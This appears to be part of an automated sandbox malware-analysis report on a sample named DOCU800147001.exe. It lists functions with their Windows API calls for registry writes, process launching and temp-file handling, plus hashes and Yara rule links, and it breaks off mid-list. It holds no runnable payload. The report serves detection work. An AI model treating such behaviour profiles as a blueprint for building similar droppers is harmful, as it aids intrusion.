                                                • API String ID: 1912718029-0
                                                • Opcode ID: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
                                                • Instruction ID: a469cac220e3dfead07ca09df23e0d0f9d1726d397e4729d51af2cb9ca56ac8c
                                                • Opcode Fuzzy Hash: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
                                                • Instruction Fuzzy Hash: 60116D31A04148FFDF219F90DE48EAF7B79EB44344F104176FA06A01A0D7B49E51AF59
                                                Function 0040231E Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 763 40231e-402364 call 402af4 call 4029ff * 2 RegCreateKeyExA 770 402894-4028a3 763->770 771 40236a-402372 763->771 772 402382-402385 771->772 773 402374-402381 call 4029ff lstrlenA 771->773 776 402395-402398 772->776 777 402387-402394 call 4029e2 772->777 773->772 781 4023a9-4023bd RegSetValueExA 776->781 782 40239a-4023a4 call 402e64 776->782 777->776 785 4023c2-402498 RegCloseKey 781->785 786 4023bf 781->786 782->781 785->770 786->785
                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040235C
                                                • lstrlenA.KERNEL32(00409B98,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040237C
                                                • RegSetValueExA.ADVAPI32(?,?,?,?,00409B98,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023B5
                                                • RegCloseKey.ADVAPI32(?,?,?,00409B98,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: 06ffb2ec8a7ae9750d02349d6064bbde1cb5da702843f6e69b8d1a4e1f770987
                                                • Instruction ID: d4937ef9b5a83c2972188be2a0d5841753625f31b596684550d6a8464bef8130
                                                • Opcode Fuzzy Hash: 06ffb2ec8a7ae9750d02349d6064bbde1cb5da702843f6e69b8d1a4e1f770987
                                                • Instruction Fuzzy Hash: 34117FB1E00118BFEB10EBA4DE8AEAF767CFB50358F10413AF905B61D1D6B85D41A668
                                                Function 0040532D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
                                                • CloseHandle.KERNEL32(?), ref: 0040535F
                                                Strings
                                                • Error launching installer, xrefs: 00405340
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
                                                • Instruction ID: 704f217b0c1b6eb60c5a067d09c70ef836417bf4f65591a609eb3a14675a7da7
                                                • Opcode Fuzzy Hash: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
                                                • Instruction Fuzzy Hash: 55E0ECB4A00209BBEB009F64EC0996FBBBCFB04344B048531E910E2250D778E4108AB9
                                                Function 00403097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E3D
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                  • Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\DOCU800147001.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E4F
                                                  • Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405E5F
                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 004030B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-3512041753
                                                • Opcode ID: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
                                                • Instruction ID: ea5cc8e1fe03df48a2deef22c0a6e0afb1540a3998a3053c1cd1c9b1fd1a59a7
                                                • Opcode Fuzzy Hash: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
                                                • Instruction Fuzzy Hash: 8CD0C92290AD3121D59237663C0AFCF095C9F9735EB019177F419740C65A6D1A8249EF
                                                Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                  • Part of subcall function 00404E65: lstrcatA.KERNEL32(Completed,00402F9E,00402F9E,Completed,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                  • Part of subcall function 00404E65: SetWindowTextA.USER32(Completed,Completed), ref: 00404ED3
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                  • Part of subcall function 0040532D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
                                                  • Part of subcall function 0040532D: CloseHandle.KERNEL32(?), ref: 0040535F
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                • String ID:
                                                • API String ID: 3521207402-0
                                                • Opcode ID: 7925bea5e642960b0f97787477d610df41be1d64d665cf53514c4a0e3087d079
                                                • Instruction ID: 9699cf0a6c97e1698ecba8eb95fa3f921ed053e19654e9fc7eefe6a52c881a96
                                                • Opcode Fuzzy Hash: 7925bea5e642960b0f97787477d610df41be1d64d665cf53514c4a0e3087d079
                                                • Instruction Fuzzy Hash: 77015B31904118EBCF10AFA1D9459AE7B71AB00344F10853BF601B51E0C7B849419FAA
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
                                                • Instruction ID: d8ab33b2893eeb752da5ba8574eb8ffac6e67a4653c4243f2171701694b169e5
                                                • Opcode Fuzzy Hash: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
                                                • Instruction Fuzzy Hash: A501FF31A242209BF7194B789C04B6A3698E751368F14C23BF811F66F1EA7CDC028B4D
                                                Function 004022C2 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402B09: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31
                                                • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022E1
                                                • RegCloseKey.ADVAPI32(00000000), ref: 004022EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 25997b1b9af40c257d56997543861e8423bbb253a6b61985772ef5b0be77c3c7
                                                • Instruction ID: 08cb8e98125a8f79caec059c590c17e630d8f9a81ea777e9c37a3f9ee27a84ba
                                                • Opcode Fuzzy Hash: 25997b1b9af40c257d56997543861e8423bbb253a6b61985772ef5b0be77c3c7
                                                • Instruction Fuzzy Hash: B0F0C873A001119BDB00BBF48F4EAAE7264AB40318F10453BF101B71C1D9FC4D01A62D
                                                Function 00404F37 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00404F47
                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00010438,00000000,00000000,00000000), ref: 00403EC6
                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 00404F93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: aa4188b62621580d761a512a9855edb02dd72737c01844acf1fe4d105f554336
                                                • Instruction ID: 579c5d3032b156fa312e8b567b83ae12dc44854dcecbc9235507f8ad4aa886f6
                                                • Opcode Fuzzy Hash: aa4188b62621580d761a512a9855edb02dd72737c01844acf1fe4d105f554336
                                                • Instruction Fuzzy Hash: 80F024B75092118EF3415B519C00B62B7A4ABC4355F04807FFF44B72E1C37D9C00866D
                                                Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 3df5fa63fb776867876ce9c4f711150247bb4b5b5ef7133640c886279d349b3f
                                                • Instruction ID: 956114eb2dd735bad5388d6a49995c17c0853b2121f7b666b24c29842559ac1c
                                                • Opcode Fuzzy Hash: 3df5fa63fb776867876ce9c4f711150247bb4b5b5ef7133640c886279d349b3f
                                                • Instruction Fuzzy Hash: 7FE0C272E04120DFDB14FBB4AE8A56E3368DF10359F204437F602F10C1D2B89C41966E
                                                Function 0040580B Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 0040580F
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                • Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
                                                • Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                • Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16
                                                Function 004057E6 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,?,004053FE,?,?,00000000,004055E1,?,?,?,?), ref: 004057EB
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004057FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                • Instruction ID: aa63d8e265fec5eadac8fa568c07c8a88d9efeeaed3b0596099faf0ea9ff9f2d
                                                • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                                • Instruction Fuzzy Hash: 4FD0C972908120EBD2102728AD0889BBB55EB542717028B31FC65A22F0C7304C62CAA5
                                                Function 00405883 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307D,00000000,00000000,00402EB4,000000FF,00000004,00000000,00000000,00000000), ref: 00405897
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
